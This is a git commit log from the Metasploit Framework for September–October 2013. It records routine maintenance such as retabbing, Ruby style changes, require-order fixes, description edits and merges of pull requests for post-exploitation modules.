Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.

FIXRM #8460
2013-10-08 11:11:38 -05:00
Tod Beardsley 4266b88a20
Move author name to just 'joev'
[See #2476]
2013-10-07 12:50:04 -05:00
Meatballs c460f943f7
Merge branch 'master' into data_dir
Conflicts:
	modules/exploits/windows/local/always_install_elevated.rb
	plugins/sounds.rb
	scripts/meterpreter/powerdump.rb
	scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
Tod Beardsley 4dc88cf60f Expand descriptions for ease of use. 2013-09-30 13:30:31 -05:00
Tod Beardsley 7cc2ad55a6
Land #1770, unattend.xml snarfing modules 2013-09-27 16:04:38 -05:00
Tod Beardsley d869b1bb70 Unless, unless everywhere. 2013-09-27 15:55:57 -05:00
Tod Beardsley ae655e42d2 Touchups: boolean check, unless, and TODO comment 2013-09-27 15:54:03 -05:00
Tod Beardsley 37e4d58f4a Call CSV text/plain so it can be viewed normally
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
2013-09-27 15:48:48 -05:00
Tod Beardsley 5e77dccd48 Add a ref to an example unattend.xml 2013-09-27 15:45:57 -05:00
Meatballs 7ba846ca24 Find and replace 2013-09-26 20:34:48 +01:00
Meatballs f9359c9d88 Use meterpreter dns resolve 2013-09-24 21:58:04 +01:00
Meatballs 2eff44d7e1 Swap x64/x86 detection 2013-09-24 20:01:45 +01:00
Meatballs b6fd14fd66 Use meterp dns lookup 2013-09-24 19:58:09 +01:00
Meatballs f1e563d375 Merge branch 'master' of github.com:rapid7/metasploit-framework into enum_ad_perf 2013-09-24 19:08:52 +01:00
Tod Beardsley f47d4d7927 Revert change for resolve_hosts after #2415 2013-09-24 12:47:00 -05:00
jvazquez-r7 7eecf7e6f0
Land #2415, @Meatballs1's fix for resolve_hosts platform list 2013-09-24 12:37:03 -05:00
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
Meatballs1 4b4ab3a6a0 Remove Linux Plat from ResolveHosts 2013-09-24 12:00:53 -05:00
Tod Beardsley 8db1a389eb
Land #2304 fix post module require order
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
Tod Beardsley e885ab45b6
Land #1734 Metasploit side for ip resolv 2013-09-23 16:18:40 -05:00
James Lee 9a555d8701 Fix the modules added since the branch 2013-09-17 18:25:12 -05:00
James Lee 150f0f644e Merge branch 'rapid7' into bug/osx-mods-load-order
Conflicts:
	modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
Joe Vennix 84f015320a Probably helps to use the right alternate exploit name. 2013-09-12 16:16:49 -05:00
Joe Vennix 14577441ca Deprecates windows persistence post module. 2013-09-12 16:10:48 -05:00
James Lee 58b634dd27 Remove unnecessary requires from post mods 2013-09-12 14:36:01 -05:00
James Lee 41f23d5268 Fix merge fail
The whitespace fixes from @tabassassin somehow hosed this change.

See
845bf7146b
and
6daa90a4a5
2013-09-11 16:22:35 -05:00
jvazquez-r7 4f1db80c24 Fix requires in new post modules 2013-09-10 11:13:07 -05:00
Tod Beardsley aff35a615b Grammar fixes in descriptions 2013-09-09 15:09:53 -05:00
jvazquez-r7 ffa600ff8b Fix really the check method 2013-09-06 10:21:18 -05:00
jvazquez-r7 9b9e1592fd Retab changes 2013-09-06 10:13:38 -05:00
jvazquez-r7 a64f960bfc Merge for retab 2013-09-06 10:12:55 -05:00
jvazquez-r7 d9fed860a5 Fix check method 2013-09-06 10:11:06 -05:00
Tab Assassin b3b8cee870 Retab changes for PR #1473 2013-09-05 16:19:05 -05:00
Tab Assassin 0ba4e1da65 Merge for retab 2013-09-05 16:18:56 -05:00
Tab Assassin 2e9096d427 Retab changes for PR #1734 2013-09-05 14:59:41 -05:00
Tab Assassin 322ed35bb4 Merge for retab 2013-09-05 14:59:34 -05:00
Tab Assassin 2846a5d680 Retab changes for PR #1770 2013-09-05 14:57:40 -05:00
Tab Assassin 269c1a26cb Merge for retab 2013-09-05 14:57:32 -05:00
Tab Assassin 26b8364dcb Retab changes for PR #1789 2013-09-05 14:44:21 -05:00